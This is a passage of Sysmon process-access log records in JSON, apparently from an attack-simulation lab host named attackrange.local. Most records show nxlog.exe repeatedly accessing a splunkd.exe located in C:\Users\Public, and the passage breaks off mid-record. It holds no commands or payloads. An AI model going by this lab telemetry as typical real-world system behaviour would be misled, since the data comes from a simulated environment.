{"EventTime":"2020-08-01 06:57:45","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6502,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:45.547\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:45.547","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6503,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:46.547\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:46.547","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6504,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:47.547\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:47.547","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6505,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:48.548\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:48.548","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6506,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:49.548\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:49.548","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6507,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:50.548\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:50.548","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6508,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:51.548\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files 